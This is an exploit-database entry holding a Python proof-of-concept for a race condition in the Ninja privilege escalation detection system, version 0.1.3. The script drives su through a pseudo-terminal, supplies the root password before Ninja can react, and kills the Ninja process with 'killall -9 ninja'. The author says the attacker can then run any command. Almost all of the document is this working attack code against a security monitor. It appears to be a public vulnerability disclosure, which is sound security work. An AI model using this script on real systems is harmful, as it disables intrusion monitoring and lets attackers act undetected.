Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition Exploit



EKU-ID: 4805 CVE: OSVDB-ID:
Author: Ben 'highjack' Sheppard Published: 2015-04-30 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#[Title] Ninja privilege escalation detection and prevention system race condition
#[Author] Ben 'highjack' Sheppard
#[URL] http://highjack.github.io/
#[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected.
#It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
#The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
#[Software Link] http://forkbomb.org/ninja/
#[Date] 29/04/2015
#[Version] 0.1.3
#[Tested on] Kali Linux
#[Demo] https://www.youtube.com/watch?v=P8VJCUUJPLg
   
#See me hitting every open port, 'cause im banging on their system while I'm staying out of the court
#https://www.youtube.com/watch?v=eA136fOsSeQ
   
import pty, os, sys, subprocess
pid, fd = pty.fork()
   
#begin config
user = "root"
password  = "mypassword" #change this :)
command = "killall -9 ninja"
#end config
   
   
def usage():
    print """
@@@  @@@  @@@   @@@@@@@@  @@@  @@@       @@@   @@@@@@    @@@@@@@  @@@  @@@  
@@@  @@@  @@@  @@@@@@@@@  @@@  @@@       @@@  @@@@@@@@  @@@@@@@@  @@@  @@@  
@@!  @@@  @@!  !@@        @@!  @@@       @@!  @@!  @@@  !@@       @@!  !@@  
!@!  @!@  !@!  !@!        !@!  @!@       !@!  !@!  @!@  !@!       !@!  @!!  
@!@!@!@!  !!@  !@! @!@!@  @!@!@!@!       !!@  @!@!@!@!  !@!       @!@@!@!   
!!!@!!!!  !!!  !!! !!@!!  !!!@!!!!       !!!  !!!@!!!!  !!!       !!@!!!    
!!:  !!!  !!:  :!!   !!:  !!:  !!!       !!:  !!:  !!!  :!!       !!: :!!   
:!:  !:!  :!:  :!:   !::  :!:  !:!  !!:  :!:  :!:  !:!  :!:       :!:  !:!  
::   :::   ::   ::: ::::  ::   :::  ::: : ::  ::   :::   ::: :::   ::  :::  
 :   : :  :     :: :: :    :   : :   : :::     :   : :   :: :: :   :   ::: 
    
[Title] Ninja privilege escalation detection and prevention system 0.1.3 race condition
[Author] Ben 'highjack' Sheppard
[URL] http://highjack.github.io/
    
[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected.
It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
 """
    
   
executions = 0
def check_procs():
    p1 = subprocess.Popen(["ps", "aux"], stdout=subprocess.PIPE)
    p2 = subprocess.Popen(["grep", "root"],  stdin=p1.stdout,  stdout=subprocess.PIPE)
    p3 = subprocess.Popen(["grep", "/sbin/ninja"], stdin=p2.stdout, stdout=subprocess.PIPE)
    output = p3.communicate()[0]
    if output != "":
        if executions != 0:
            sys.exit(0)
        return True
    else:
        return False
   
def kill_ninja():
    if pid == 0:
        os.execvp("su", ["su", user, "-c", command])
    elif pid > 0:
        try:
            os.read(fd, 1024)
            os.write(fd, password + "\n")
            os.read(fd,1024)
            os.wait()
            os.close(fd)
        except:
            usage()
            print "[+] Ninja is terminated"
            sys.exit(0)
               
   
while True:
    kill_ninja()
    if (check_procs == True):
        executions = executions + 1
        kill_ninja()